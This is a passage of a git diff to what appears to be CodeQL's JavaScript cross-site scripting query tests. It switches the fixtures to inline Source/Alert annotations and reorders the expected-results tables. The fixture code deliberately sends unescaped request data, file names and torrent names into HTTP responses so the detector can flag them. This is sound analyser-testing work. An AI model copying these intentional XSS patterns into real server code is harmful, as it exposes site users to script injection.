app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { - let { p } = req.params; - res.send(p); // NOT OK + let { p } = req.params; // $ Source + res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { - const code = prettier.format(reg.body, { semi: false, parser: "babel" }); - res.send(code); // NOT OK + const code = prettier.format(reg.body, { semi: false, parser: "babel" }); // $ Source + res.send(code); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql deleted file mode 100644 index 38bae3a6aea6..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.StoredXssQuery as StoredXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.expected index b44f37467ce7..a2bcd0163fde 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.expected @@ -1,3 +1,9 @@ +#select +| xss-through-filenames.js:8:18:8:23 | files1 | xss-through-filenames.js:7:43:7:48 | files1 | xss-through-filenames.js:8:18:8:23 | files1 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:7:43:7:48 | files1 | stored value | +| xss-through-filenames.js:26:19:26:24 | files1 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:26:19:26:24 | files1 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | +| xss-through-filenames.js:33:19:33:24 | files2 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:33:19:33:24 | files2 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | +| xss-through-filenames.js:37:19:37:24 | files3 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:37:19:37:24 | files3 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | +| xss-through-torrent.js:7:11:7:14 | name | xss-through-torrent.js:6:13:6:24 | torrent.name | xss-through-torrent.js:7:11:7:14 | name | Stored cross-site scripting vulnerability due to $@. | xss-through-torrent.js:6:13:6:24 | torrent.name | stored value | edges | xss-through-filenames.js:7:43:7:48 | files1 | xss-through-filenames.js:8:18:8:23 | files1 | provenance | | | xss-through-filenames.js:17:21:17:26 | files2 [ArrayElement] | xss-through-filenames.js:19:9:19:14 | files2 [ArrayElement] | provenance | | @@ -54,9 +60,3 @@ subpaths | xss-through-filenames.js:30:9:30:14 | files1 | xss-through-filenames.js:30:34:30:37 | file | xss-through-filenames.js:31:13:31:18 | [post update] files2 [ArrayElement] | xss-through-filenames.js:33:19:33:24 | files2 | | xss-through-filenames.js:30:9:30:14 | files1 | xss-through-filenames.js:30:34:30:37 | file | xss-through-filenames.js:31:13:31:18 | [post update] files2 [ArrayElement] | xss-through-filenames.js:33:19:33:24 | files2 [ArrayElement] | | xss-through-filenames.js:35:29:35:34 | files2 [ArrayElement] | xss-through-filenames.js:17:21:17:26 | files2 [ArrayElement] | xss-through-filenames.js:22:16:22:30 | files3.join('') | xss-through-filenames.js:35:22:35:35 | format(files2) | -#select -| xss-through-filenames.js:8:18:8:23 | files1 | xss-through-filenames.js:7:43:7:48 | files1 | xss-through-filenames.js:8:18:8:23 | files1 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:7:43:7:48 | files1 | stored value | -| xss-through-filenames.js:26:19:26:24 | files1 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:26:19:26:24 | files1 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | -| xss-through-filenames.js:33:19:33:24 | files2 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:33:19:33:24 | files2 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | -| xss-through-filenames.js:37:19:37:24 | files3 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:37:19:37:24 | files3 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | -| xss-through-torrent.js:7:11:7:14 | name | xss-through-torrent.js:6:13:6:24 | torrent.name | xss-through-torrent.js:7:11:7:14 | name | Stored cross-site scripting vulnerability due to $@. | xss-through-torrent.js:6:13:6:24 | torrent.name | stored value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.qlref b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.qlref index 27140feea760..200bebe2a18e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.qlref @@ -1 +1,2 @@ -Security/CWE-079/StoredXss.ql \ No newline at end of file +query: Security/CWE-079/StoredXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index c04e0d784efc..0233339ad26e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -4,8 +4,8 @@ var fs = require('fs'); var express = require('express'); express().get('/', function(req, res) { - fs.readdir("/myDir", function (error, files1) { - res.send(files1); // NOT OK + fs.readdir("/myDir", function (error, files1) { // $ Source + res.send(files1); // $ Alert }); }); @@ -22,19 +22,19 @@ http.createServer(function (req, res) { return files3.join(''); } - fs.readdir("/myDir", function (error, files1) { - res.write(files1); // NOT OK + fs.readdir("/myDir", function (error, files1) { // $ Source + res.write(files1); // $ Alert var dirs = []; var files2 = []; files1.forEach(function (file) { files2.push(file); }); - res.write(files2); // NOT OK + res.write(files2); // $ Alert var files3 = format(files2); - res.write(files3); // NOT OK + res.write(files3); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index dcf530e3ef5c..2569f5623d74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js @@ -3,6 +3,6 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), - name = torrent.name; - res.send(name); // NOT OK + name = torrent.name; // $ Source + res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql deleted file mode 100644 index e67885e96b96..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeHtmlConstructionQuery as UnsafeHtmlConstruction diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.expected index 678b42231c9a..499cf6cce49d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.expected @@ -1,3 +1,75 @@ +#select +| jquery-plugin.js:12:31:12:41 | options.foo | jquery-plugin.js:11:34:11:40 | options | jquery-plugin.js:12:31:12:41 | options.foo | This HTML construction which depends on $@ might later allow $@. | jquery-plugin.js:11:34:11:40 | options | library input | jquery-plugin.js:12:20:12:53 | " ... /span>" | cross-site scripting | +| jquery-plugin.js:14:31:14:35 | stuff | jquery-plugin.js:11:27:11:31 | stuff | jquery-plugin.js:14:31:14:35 | stuff | This HTML construction which depends on $@ might later allow $@. | jquery-plugin.js:11:27:11:31 | stuff | library input | jquery-plugin.js:14:20:14:47 | " ... /span>" | cross-site scripting | +| lib2/index.ts:2:27:2:27 | s | lib2/index.ts:1:28:1:28 | s | lib2/index.ts:2:27:2:27 | s | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:1:28:1:28 | s | library input | lib2/index.ts:3:47:3:50 | html | cross-site scripting | +| lib2/index.ts:7:58:7:65 | settings | lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:7:58:7:65 | settings | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:6:29:6:36 | settings | library input | lib2/index.ts:7:47:7:77 | " ... /span>" | cross-site scripting | +| lib2/index.ts:18:62:18:65 | name | lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:18:62:18:65 | name | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:6:29:6:36 | settings | library input | lib2/index.ts:18:51:18:77 | " ... /span>" | cross-site scripting | +| lib2/src/MyNode.ts:2:29:2:29 | s | lib2/src/MyNode.ts:1:28:1:28 | s | lib2/src/MyNode.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | lib2/src/MyNode.ts:1:28:1:28 | s | library input | lib2/src/MyNode.ts:3:49:3:52 | html | cross-site scripting | +| lib/src/MyNode.ts:2:29:2:29 | s | lib/src/MyNode.ts:1:28:1:28 | s | lib/src/MyNode.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | lib/src/MyNode.ts:1:28:1:28 | s | library input | lib/src/MyNode.ts:3:49:3:52 | html | cross-site scripting | +| main.js:2:29:2:29 | s | main.js:1:55:1:55 | s | main.js:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | main.js:1:55:1:55 | s | library input | main.js:3:49:3:52 | html | cross-site scripting | +| main.js:7:49:7:49 | s | main.js:6:49:6:49 | s | main.js:7:49:7:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:6:49:6:49 | s | library input | main.js:8:48:8:66 | doc.documentElement | cross-site scripting | +| main.js:12:49:12:49 | s | main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:11:60:11:60 | s | library input | main.js:16:21:16:35 | xml.cloneNode() | cross-site scripting | +| main.js:12:49:12:49 | s | main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:11:60:11:60 | s | library input | main.js:17:48:17:50 | tmp | cross-site scripting | +| main.js:22:34:22:34 | s | main.js:21:47:21:47 | s | main.js:22:34:22:34 | s | This markdown rendering which depends on $@ might later allow $@. | main.js:21:47:21:47 | s | library input | main.js:23:53:23:56 | html | cross-site scripting | +| main.js:62:19:62:31 | settings.name | main.js:56:28:56:34 | options | main.js:62:19:62:31 | settings.name | This HTML construction which depends on $@ might later allow $@. | main.js:56:28:56:34 | options | library input | main.js:62:11:62:40 | "" + ... "" | cross-site scripting | +| main.js:67:63:67:69 | attrVal | main.js:66:35:66:41 | attrVal | main.js:67:63:67:69 | attrVal | This HTML construction which depends on $@ might later allow $@. | main.js:66:35:66:41 | attrVal | library input | main.js:67:47:67:78 | "" | cross-site scripting | +| main.js:81:35:81:37 | val | main.js:79:34:79:36 | val | main.js:81:35:81:37 | val | This HTML construction which depends on $@ might later allow $@. | main.js:79:34:79:36 | val | library input | main.js:81:24:81:49 | " ... /span>" | cross-site scripting | +| main.js:90:23:90:23 | x | main.js:93:43:93:43 | x | main.js:90:23:90:23 | x | This HTML construction which depends on $@ might later allow $@. | main.js:93:43:93:43 | x | library input | main.js:94:20:94:32 | createHTML(x) | cross-site scripting | +| main.js:99:28:99:28 | x | main.js:98:43:98:43 | x | main.js:99:28:99:28 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:100:24:100:26 | svg | cross-site scripting | +| main.js:103:43:103:43 | x | main.js:98:43:98:43 | x | main.js:103:43:103:43 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:103:20:103:44 | myMerma ... id", x) | cross-site scripting | +| main.js:105:26:105:26 | x | main.js:98:43:98:43 | x | main.js:105:26:105:26 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:106:24:106:26 | svg | cross-site scripting | +| main.js:109:41:109:41 | x | main.js:98:43:98:43 | x | main.js:109:41:109:41 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:109:20:109:42 | mermaid ... id", x) | cross-site scripting | +| main.js:111:37:111:37 | x | main.js:98:43:98:43 | x | main.js:111:37:111:37 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:112:24:112:26 | svg | cross-site scripting | +| main.js:117:34:117:34 | s | main.js:116:47:116:47 | s | main.js:117:34:117:34 | s | This markdown rendering which depends on $@ might later allow $@. | main.js:116:47:116:47 | s | library input | main.js:118:53:118:56 | html | cross-site scripting | +| typed.ts:2:29:2:29 | s | typed.ts:1:39:1:39 | s | typed.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | typed.ts:1:39:1:39 | s | library input | typed.ts:3:31:3:34 | html | cross-site scripting | +| typed.ts:8:40:8:40 | s | typed.ts:6:43:6:43 | s | typed.ts:8:40:8:40 | s | This HTML construction which depends on $@ might later allow $@. | typed.ts:6:43:6:43 | s | library input | typed.ts:8:29:8:52 | " ... /span>" | cross-site scripting | +edges +| jquery-plugin.js:11:27:11:31 | stuff | jquery-plugin.js:14:31:14:35 | stuff | provenance | | +| jquery-plugin.js:11:34:11:40 | options | jquery-plugin.js:12:31:12:37 | options | provenance | | +| jquery-plugin.js:12:31:12:37 | options | jquery-plugin.js:12:31:12:41 | options.foo | provenance | Config | +| lib2/index.ts:1:28:1:28 | s | lib2/index.ts:2:27:2:27 | s | provenance | | +| lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:7:58:7:65 | settings | provenance | | +| lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:13:16:13:23 | settings | provenance | | +| lib2/index.ts:13:9:13:41 | name | lib2/index.ts:18:62:18:65 | name | provenance | | +| lib2/index.ts:13:16:13:23 | settings | lib2/index.ts:13:16:13:33 | settings.mySetting | provenance | Config | +| lib2/index.ts:13:16:13:33 | settings.mySetting | lib2/index.ts:13:16:13:36 | setting ... ting[i] | provenance | Config | +| lib2/index.ts:13:16:13:36 | setting ... ting[i] | lib2/index.ts:13:16:13:41 | setting ... i].name | provenance | Config | +| lib2/index.ts:13:16:13:41 | setting ... i].name | lib2/index.ts:13:9:13:41 | name | provenance | | +| lib2/src/MyNode.ts:1:28:1:28 | s | lib2/src/MyNode.ts:2:29:2:29 | s | provenance | | +| lib/src/MyNode.ts:1:28:1:28 | s | lib/src/MyNode.ts:2:29:2:29 | s | provenance | | +| main.js:1:55:1:55 | s | main.js:2:29:2:29 | s | provenance | | +| main.js:6:49:6:49 | s | main.js:7:49:7:49 | s | provenance | | +| main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | provenance | | +| main.js:21:47:21:47 | s | main.js:22:34:22:34 | s | provenance | | +| main.js:56:28:56:34 | options | main.js:60:41:60:47 | options | provenance | | +| main.js:57:11:59:5 | defaults | main.js:60:31:60:38 | defaults | provenance | | +| main.js:57:11:59:5 | defaults | main.js:60:31:60:38 | defaults | provenance | | +| main.js:57:22:59:5 | {\\n ... "\\n } | main.js:57:11:59:5 | defaults | provenance | | +| main.js:57:22:59:5 | {\\n ... "\\n } | main.js:57:11:59:5 | defaults | provenance | | +| main.js:60:11:60:48 | settings | main.js:62:19:62:26 | settings | provenance | | +| main.js:60:22:60:48 | $.exten ... ptions) | main.js:60:11:60:48 | settings | provenance | | +| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | +| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | +| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | Config | +| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | | +| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | | +| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | Config | +| main.js:60:41:60:47 | options | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | +| main.js:60:41:60:47 | options | main.js:60:22:60:48 | $.exten ... ptions) | provenance | Config | +| main.js:62:19:62:26 | settings | main.js:62:19:62:31 | settings.name | provenance | Config | +| main.js:66:35:66:41 | attrVal | main.js:67:63:67:69 | attrVal | provenance | | +| main.js:79:34:79:36 | val | main.js:81:35:81:37 | val | provenance | | +| main.js:89:21:89:21 | x | main.js:90:23:90:23 | x | provenance | | +| main.js:93:43:93:43 | x | main.js:94:31:94:31 | x | provenance | | +| main.js:94:31:94:31 | x | main.js:89:21:89:21 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:99:28:99:28 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:103:43:103:43 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:105:26:105:26 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:109:41:109:41 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:111:37:111:37 | x | provenance | | +| main.js:116:47:116:47 | s | main.js:117:34:117:34 | s | provenance | | +| typed.ts:1:39:1:39 | s | typed.ts:2:29:2:29 | s | provenance | | +| typed.ts:6:43:6:43 | s | typed.ts:8:40:8:40 | s | provenance | | nodes | jquery-plugin.js:11:27:11:31 | stuff | semmle.label | stuff | | jquery-plugin.js:11:34:11:40 | options | semmle.label | options | @@ -58,76 +130,4 @@ nodes | typed.ts:2:29:2:29 | s | semmle.label | s | | typed.ts:6:43:6:43 | s | semmle.label | s | | typed.ts:8:40:8:40 | s | semmle.label | s | -edges -| jquery-plugin.js:11:27:11:31 | stuff | jquery-plugin.js:14:31:14:35 | stuff | provenance | | -| jquery-plugin.js:11:34:11:40 | options | jquery-plugin.js:12:31:12:37 | options | provenance | | -| jquery-plugin.js:12:31:12:37 | options | jquery-plugin.js:12:31:12:41 | options.foo | provenance | Config | -| lib2/index.ts:1:28:1:28 | s | lib2/index.ts:2:27:2:27 | s | provenance | | -| lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:7:58:7:65 | settings | provenance | | -| lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:13:16:13:23 | settings | provenance | | -| lib2/index.ts:13:9:13:41 | name | lib2/index.ts:18:62:18:65 | name | provenance | | -| lib2/index.ts:13:16:13:23 | settings | lib2/index.ts:13:16:13:33 | settings.mySetting | provenance | Config | -| lib2/index.ts:13:16:13:33 | settings.mySetting | lib2/index.ts:13:16:13:36 | setting ... ting[i] | provenance | Config | -| lib2/index.ts:13:16:13:36 | setting ... ting[i] | lib2/index.ts:13:16:13:41 | setting ... i].name | provenance | Config | -| lib2/index.ts:13:16:13:41 | setting ... i].name | lib2/index.ts:13:9:13:41 | name | provenance | | -| lib2/src/MyNode.ts:1:28:1:28 | s | lib2/src/MyNode.ts:2:29:2:29 | s | provenance | | -| lib/src/MyNode.ts:1:28:1:28 | s | lib/src/MyNode.ts:2:29:2:29 | s | provenance | | -| main.js:1:55:1:55 | s | main.js:2:29:2:29 | s | provenance | | -| main.js:6:49:6:49 | s | main.js:7:49:7:49 | s | provenance | | -| main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | provenance | | -| main.js:21:47:21:47 | s | main.js:22:34:22:34 | s | provenance | | -| main.js:56:28:56:34 | options | main.js:60:41:60:47 | options | provenance | | -| main.js:57:11:59:5 | defaults | main.js:60:31:60:38 | defaults | provenance | | -| main.js:57:11:59:5 | defaults | main.js:60:31:60:38 | defaults | provenance | | -| main.js:57:22:59:5 | {\\n ... "\\n } | main.js:57:11:59:5 | defaults | provenance | | -| main.js:57:22:59:5 | {\\n ... "\\n } | main.js:57:11:59:5 | defaults | provenance | | -| main.js:60:11:60:48 | settings | main.js:62:19:62:26 | settings | provenance | | -| main.js:60:22:60:48 | $.exten ... ptions) | main.js:60:11:60:48 | settings | provenance | | -| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | -| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | -| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | Config | -| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | | -| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | | -| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | Config | -| main.js:60:41:60:47 | options | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | -| main.js:60:41:60:47 | options | main.js:60:22:60:48 | $.exten ... ptions) | provenance | Config | -| main.js:62:19:62:26 | settings | main.js:62:19:62:31 | settings.name | provenance | Config | -| main.js:66:35:66:41 | attrVal | main.js:67:63:67:69 | attrVal | provenance | | -| main.js:79:34:79:36 | val | main.js:81:35:81:37 | val | provenance | | -| main.js:89:21:89:21 | x | main.js:90:23:90:23 | x | provenance | | -| main.js:93:43:93:43 | x | main.js:94:31:94:31 | x | provenance | | -| main.js:94:31:94:31 | x | main.js:89:21:89:21 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:99:28:99:28 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:103:43:103:43 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:105:26:105:26 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:109:41:109:41 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:111:37:111:37 | x | provenance | | -| main.js:116:47:116:47 | s | main.js:117:34:117:34 | s | provenance | | -| typed.ts:1:39:1:39 | s | typed.ts:2:29:2:29 | s | provenance | | -| typed.ts:6:43:6:43 | s | typed.ts:8:40:8:40 | s | provenance | | subpaths -#select -| jquery-plugin.js:12:31:12:41 | options.foo | jquery-plugin.js:11:34:11:40 | options | jquery-plugin.js:12:31:12:41 | options.foo | This HTML construction which depends on $@ might later allow $@. | jquery-plugin.js:11:34:11:40 | options | library input | jquery-plugin.js:12:20:12:53 | " ... /span>" | cross-site scripting | -| jquery-plugin.js:14:31:14:35 | stuff | jquery-plugin.js:11:27:11:31 | stuff | jquery-plugin.js:14:31:14:35 | stuff | This HTML construction which depends on $@ might later allow $@. | jquery-plugin.js:11:27:11:31 | stuff | library input | jquery-plugin.js:14:20:14:47 | " ... /span>" | cross-site scripting | -| lib2/index.ts:2:27:2:27 | s | lib2/index.ts:1:28:1:28 | s | lib2/index.ts:2:27:2:27 | s | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:1:28:1:28 | s | library input | lib2/index.ts:3:47:3:50 | html | cross-site scripting | -| lib2/index.ts:7:58:7:65 | settings | lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:7:58:7:65 | settings | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:6:29:6:36 | settings | library input | lib2/index.ts:7:47:7:77 | " ... /span>" | cross-site scripting | -| lib2/index.ts:18:62:18:65 | name | lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:18:62:18:65 | name | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:6:29:6:36 | settings | library input | lib2/index.ts:18:51:18:77 | " ... /span>" | cross-site scripting | -| lib2/src/MyNode.ts:2:29:2:29 | s | lib2/src/MyNode.ts:1:28:1:28 | s | lib2/src/MyNode.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | lib2/src/MyNode.ts:1:28:1:28 | s | library input | lib2/src/MyNode.ts:3:49:3:52 | html | cross-site scripting | -| lib/src/MyNode.ts:2:29:2:29 | s | lib/src/MyNode.ts:1:28:1:28 | s | lib/src/MyNode.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | lib/src/MyNode.ts:1:28:1:28 | s | library input | lib/src/MyNode.ts:3:49:3:52 | html | cross-site scripting | -| main.js:2:29:2:29 | s | main.js:1:55:1:55 | s | main.js:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | main.js:1:55:1:55 | s | library input | main.js:3:49:3:52 | html | cross-site scripting | -| main.js:7:49:7:49 | s | main.js:6:49:6:49 | s | main.js:7:49:7:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:6:49:6:49 | s | library input | main.js:8:48:8:66 | doc.documentElement | cross-site scripting | -| main.js:12:49:12:49 | s | main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:11:60:11:60 | s | library input | main.js:16:21:16:35 | xml.cloneNode() | cross-site scripting | -| main.js:12:49:12:49 | s | main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:11:60:11:60 | s | library input | main.js:17:48:17:50 | tmp | cross-site scripting | -| main.js:22:34:22:34 | s | main.js:21:47:21:47 | s | main.js:22:34:22:34 | s | This markdown rendering which depends on $@ might later allow $@. | main.js:21:47:21:47 | s | library input | main.js:23:53:23:56 | html | cross-site scripting | -| main.js:62:19:62:31 | settings.name | main.js:56:28:56:34 | options | main.js:62:19:62:31 | settings.name | This HTML construction which depends on $@ might later allow $@. | main.js:56:28:56:34 | options | library input | main.js:62:11:62:40 | "" + ... "" | cross-site scripting | -| main.js:67:63:67:69 | attrVal | main.js:66:35:66:41 | attrVal | main.js:67:63:67:69 | attrVal | This HTML construction which depends on $@ might later allow $@. | main.js:66:35:66:41 | attrVal | library input | main.js:67:47:67:78 | "" | cross-site scripting | -| main.js:81:35:81:37 | val | main.js:79:34:79:36 | val | main.js:81:35:81:37 | val | This HTML construction which depends on $@ might later allow $@. | main.js:79:34:79:36 | val | library input | main.js:81:24:81:49 | " ... /span>" | cross-site scripting | -| main.js:90:23:90:23 | x | main.js:93:43:93:43 | x | main.js:90:23:90:23 | x | This HTML construction which depends on $@ might later allow $@. | main.js:93:43:93:43 | x | library input | main.js:94:20:94:32 | createHTML(x) | cross-site scripting | -| main.js:99:28:99:28 | x | main.js:98:43:98:43 | x | main.js:99:28:99:28 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:100:24:100:26 | svg | cross-site scripting | -| main.js:103:43:103:43 | x | main.js:98:43:98:43 | x | main.js:103:43:103:43 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:103:20:103:44 | myMerma ... id", x) | cross-site scripting | -| main.js:105:26:105:26 | x | main.js:98:43:98:43 | x | main.js:105:26:105:26 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:106:24:106:26 | svg | cross-site scripting | -| main.js:109:41:109:41 | x | main.js:98:43:98:43 | x | main.js:109:41:109:41 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:109:20:109:42 | mermaid ... id", x) | cross-site scripting | -| main.js:111:37:111:37 | x | main.js:98:43:98:43 | x | main.js:111:37:111:37 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:112:24:112:26 | svg | cross-site scripting | -| main.js:117:34:117:34 | s | main.js:116:47:116:47 | s | main.js:117:34:117:34 | s | This markdown rendering which depends on $@ might later allow $@. | main.js:116:47:116:47 | s | library input | main.js:118:53:118:56 | html | cross-site scripting | -| typed.ts:2:29:2:29 | s | typed.ts:1:39:1:39 | s | typed.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | typed.ts:1:39:1:39 | s | library input | typed.ts:3:31:3:34 | html | cross-site scripting | -| typed.ts:8:40:8:40 | s | typed.ts:6:43:6:43 | s | typed.ts:8:40:8:40 | s | This HTML construction which depends on $@ might later allow $@. | typed.ts:6:43:6:43 | s | library input | typed.ts:8:29:8:52 | " ... /span>" | cross-site scripting | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.qlref b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.qlref index 0fbe0ed0ba1a..b8e264532e4c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.qlref @@ -1 +1,2 @@ -Security/CWE-079/UnsafeHtmlConstruction.ql \ No newline at end of file +query: 